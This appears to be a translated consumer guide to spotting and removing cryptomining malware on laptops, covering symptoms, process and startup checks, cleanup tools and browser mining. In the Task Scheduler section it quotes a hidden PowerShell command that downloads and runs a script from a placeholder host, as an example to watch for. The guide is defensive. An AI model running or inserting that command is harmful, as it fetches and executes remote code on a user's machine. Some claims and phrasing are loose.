Have you noticed that your laptop is running slower, heating up for no reason, or running out of charge in a matter of hours? Perhaps the culprit is not battery wear or outdated hardware, but hidden miner - malware that uses the resources of your device to mine cryptocurrency. Unlike classic viruses, miners do not steal data or block the system, but they destroy hardware 2–3 times faster than normal wear.
The problem is that modern miners can masquerade as system processes, launch when Windows starts, and even bypass antivirus programs. For example, malware WannaMine spreads through protocol vulnerabilities SMB (like the famous WannaCry), and XMRig can work in the background for years, extracting Monero on your processor. In this article, we will look at how to identify a miner on a laptop, even if it is hidden deep in the system, and what to do to get rid of it forever.
1. Main features of a miner on a laptop
Miners do not always show their presence with clear symptoms, but there are 7 key signs, which should be of concern. They can be divided into two groups: hardware (related to hardware) and software (anomalies in the operation of the OS).
For example, if your laptop ASUS ROG or MSI Gaming suddenly started to warm up 90–95°C in idle mode, this is an alarming signal. Normal temperature for processors Intel Core i7 or AMD Ryzen 7 in idle time - 40–50°C. Excess by 20–30°C without load almost always indicates hidden activity.
- 🔥 Overheating for no reason - the coolers are running at maximum, the case is hot, although you did not run games or render.
- 🔋 Instant battery drain — the laptop discharges in 1–2 hours instead of the usual 5–6, even in standby mode.
- 🐢 System slowdown - lags when opening folders, browser freezes, although before everything worked quickly.
- 📈 Unexplained CPU/GPU load — in the task manager, the processor or video card is loaded at 80–100% for no apparent reason.
- 🚫 Blocking updates — Windows or antivirus suddenly stopped updating (miners often disable protection).
- 🌐 Suspicious traffic - the laptop “downloads something” even when you are not using the Internet (check in
Resource Monitor). - 🔄 Spontaneous reboots — the device suddenly turns off or reboots, especially during prolonged use.
⚠️ Attention: If the laptop gets hot and slows down only when connected to charging, it may not be the miner, but a problem with the power management drivers. Check the power plan settings in Control Panel → Power Options.
2. How to check a laptop for a miner: step-by-step instructions
To confirm or refute suspicions, you need to carry out diagnostics in 4 directions: process checking, network activity analysis, virus scanning and temperature monitoring. Let's start with the simplest thing - the task manager.
Open it with a keyboard shortcut Ctrl + Shift + Esc and go to the tab Details. Sort processes by load on CPU or GP. Please note:
- 🤖 Processes with strange names (for example,
svchost.exe *32with a high load - this may be camouflage). - 🔍 Unknown services consuming >20% of resources (for example,
Windows Update Medic Serviceshould not load the processor constantly). - 🖥️ Processes related to GPU (For example,
NVIDIA ContainerorAMD Drivershould not work without playing).
If there is nothing suspicious in the manager, go to network monitoring. Open Resource Monitor (type in Windows search) and go to the tab Network. Miners often join pools to mine cryptocurrency, so look for:
- 🌍 Connections to domains with words
mine,pool,crypto(For example,xmr.pool.minergate.com). - 📡 Constant outgoing traffic (even when the browser is closed).
- 🔗 Suspicious IP addresses (check via VirusTotal).
Open Task Manager and sort processes by CPU/GPU|
Check Resource Monitor for suspicious network traffic|
Download Process Explorer and check parent processes|
Run an antivirus scan (for example, Kaspersky Virus Removal Tool)|
View startup via msconfig-->
3. Hidden miners: how to detect them if the antivirus is silent
Modern miners are able to bypass standard antivirus programs by masquerading as legitimate processes. For example, malware PowerGhost uses Windows Management Instrumentation (WMI) for hidden execution, and Norman implemented into system services. If the usual methods don't help, try these methods:
1. Check using Process Explorer (a utility from Microsoft). She shows parent processes, which helps to reveal the disguise. Download it from the official website and:
- Run
procexp.exeon behalf of the administrator. - Click
Ctrl + Fand enter the name of the suspicious process. - See what process started it (for example, if
svchost.exebegottenexplorer.exe, that's normal; if the parent is unknownservicehost.dll, this is alarming).
2. Autoload analysis. Miners are often registered in startup to start when the laptop is turned on. Check:
- 📁 Folder
C:\Users\Your_name\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. - 🔧 Section
msconfig(run the command inWin + Rand go to the tabAutoload). - 🖥️Windows Registry: Open
regeditand check out the branches:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
3. Checking the task scheduler. Miners can be launched on a schedule. Open Task Scheduler (taskschd.msc) and check:
- 🕒 Tasks with unusual names (for example,
UpdateWindowsorSystemOptimize). - 🔄 Tasks that launch
PowerShellorcmd.exewith suspicious scripts.
Example of a malicious script in Task Scheduler
The malware can create a task with the command:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://malicious.site/script.ps1'))"
This command downloads and executes a script from a remote server, which then launches the miner.
4. Top 5 utilities for finding and removing miners
If manual methods do not help, use specialized tools. Important: some miners block the installation of antivirus software, so load utilities in safe mode (click F8 when Windows starts or use msconfig).
| Utility | What is looking for | How to use | Link |
|---|---|---|---|
| Kaspersky Virus Removal Tool | Hidden miners, rootkits, trojans | Download, update databases, run full scan | Download |
| Malwarebytes Anti-Malware | Adware, miners, spyware | Install, update, run threat scan | Download |
| AdwCleaner | Adware and miners in the browser | Launch, click Scan, then Clear |
Download |
| GMER | Rootkits and hidden processes | Run as administrator, check the tab Processes |
Download |
| Process Hacker | Suspicious threads and DLL injections | Open, sort by CPU, check Threads |
Download |
If no utility finds the miner, but the symptoms remain, check the laptop BIOS/UEFI. Some viruses (for example, LoJax) are embedded in the motherboard firmware and survive reinstallation of Windows.
Standard antivirus (Avast, Kaspersky, etc.)|
Manually checking processes in Task Manager|
Specialized utilities (Malwarebytes, GMER)|
I reinstall Windows if I have any suspicions|
I don't check until problems arise -->
5. What to do if you find a miner: removal steps
Found a miner? Don't panic, but act quickly - some viruses may download additional modules or encrypt files. Here's the step-by-step plan:
- Turn off the Internet - this will prevent the miner from communicating with the control server.
- Create a restore point — click
Win + R, enterrstruiand follow the instructions. - Remove malicious processes:
- Open
Task Manager, find the suspicious process, clickOpen file storage location. - Delete the file and empty the Trash.
- Check startup and task scheduler (see section 3).
- Open
If the miner has infiltrated system files and is not removed, you will have to reinstall Windows. Before this:
- 🔄 Backup important files (but don't copy executables
.exe!). - 💾 Download the official Windows image from the Microsoft website (use Media Creation Tool).
- 🔧 Format the disk
C:during installation (selectCustom installation).
⚠️ Attention: If after reinstalling Windows the miner appears again, this means that it is hidden in BIOS/UEFI or on another drive (for example, D:). In this case, contact a specialist - tampering with the firmware yourself can damage the laptop.
6. How to protect your laptop from miners in the future
The best defense is integrated approach. Miners enter the system through:
- 📧 Malicious attachments in emails (for example, files
.jsor.vbs). - 🌐 Infected sites (via browser exploits or advertising).
- 💾 Pirated software and cracks (often contain miners as a “bonus”).
- 🔌 Vulnerable network protocols (for example,
RDPorSMB).
To minimize risks:
- Use a reliable antivirus with protection from miners (for example, Kaspersky Internet Security or Bitdefender Total Security).
- Update Windows and drivers - enable automatic updates in
Settings → Update & Security. - Block suspicious IPs via firewall:
netsh advfirewall firewall add rule name="Block Miner Pools" dir=out action=block remoteip=144.76.0.0/16,192.99.0.0/16 enable=yes(replace IP with actual pool addresses, for example, MinerGate or NiceHash).
- Disable unnecessary services:
- 🔌
Remote registry(disable inservices.msc). - 🔌
Feature Discovery Resource Publishing Service(if you are not using a local network).
- 🔌
If you often download programs from torrents, use sandbox (For example, Sandboxie). It isolates suspicious files from the system, and even if there is a miner in them, it will not be able to do any harm.
7. Browser mining: how to detect and block
Not all miners are installed on a laptop - some work directly in the browser via JavaScript. The most famous example is Coinhivewho is the miner Monero directly when visiting an infected site. Such scripts can:
- 🕵️ Use before
80% CPUyour processor. - 🕒 Work even after closing the tab (if the script is running in the background).
- 🔄 Bypass ad blockers (for example, by masquerading as legitimate analytical services).
To detect and block a browser miner:
- Open
Task Managerand check the CPU load when running the browser. - If the load is high, open your browser and click
Shift + Esc(in Chrome) orCtrl + Shift + Esc(in Firefox) - This will open the browser task manager. - Find a tab or extension that is consuming a lot of resources and close it.
- Install extensions to block miners:
- 🛡️ MinerBlock (for Chrome and Firefox).
- 🛡️ NoCoin (blocks Coinhive scripts).
- 🛡️ uBlock Origin (can block miners based on signatures).
If you often visit dubious sites (torrents, streaming platforms, hacked games), use a browser with built-in protection, for example, Brave — it blocks trackers and miners by default.
Browser miners leave no traces on the disk, but can reduce laptop performance just as much as installed viruses. Always check your CPU load when opening new tabs.
FAQ: Frequently asked questions about miners on laptops
🔍 Can a miner physically damage a laptop?
Yes. Constant load on the processor and video card leads to:
- 🔥 Overheating — Thermal paste dries out, which accelerates wear of the chips.
- 🔋 Battery degradation — discharge/charge cycles become more frequent.
- 🖥️ Reduced SSD/HDD service life - due to constant recording of temporary files.
On average, a laptop with a miner burns out 2–3 times faster than usual.
💻 Is it possible to mine on a laptop legally?
Technically yes, but highly not recommended. Laptops are not designed for 24/7 workloads:
- 🔌 Power supply may not be able to withstand increased power consumption.
- 🔥 Cooling system laptops are weaker than PCs - the risk of overheating is higher.
- 💰 Profitability is close to zero - electricity and wear and tear of hardware will eat up all the profit.
If you want to try it, use NiceHash or MinerGate, but limit the load to 50–60% and monitor the temperature.
🛡️ Which antivirus best detects miners?
According to tests AV-Comparatives (2023), the best results show:
- Kaspersky Internet Security — detects 99% of miners, including rootkits.
- Bitdefender Total Security — effective against browser and file miners.
- ESET NOD32 — finds hidden processes and scripts well.
- Malwarebytes Premium — specializes in adware and miners.
Free versions (eg Avast Free) cope worse with hidden threats.
🔄 What to do if the miner returns after being deleted?
This means that:
- Virrus is hidden in startup, task scheduler or register (see section 3).
- Infected another disk (For example,
D:) or external storage. - Miner implemented in BIOS/UEFI (reflashing required).
- The virus spreads across local network (check other devices).
In such cases:
- 🔧 Reinstall Windows with full disk formatting
C:. - 🔍 Check other drives with the utility GMER.
- 🔄 Update the BIOS from the official website of the laptop manufacturer.
📱 Can the miner be on a MacBook?
Yes, although less often. For macOS There are miners that exploit vulnerabilities in:
- 🍎 Gatekeeper (protection against untrusted software).
- 🔓 Xcode (if you installed pirated versions).
- 🌐 Safari (via malicious extensions).
To check use:
- Malwarebytes for Mac.
- Avast Security for Mac.
- Built-in utility
Activity Monitor(analogous to Task Manager).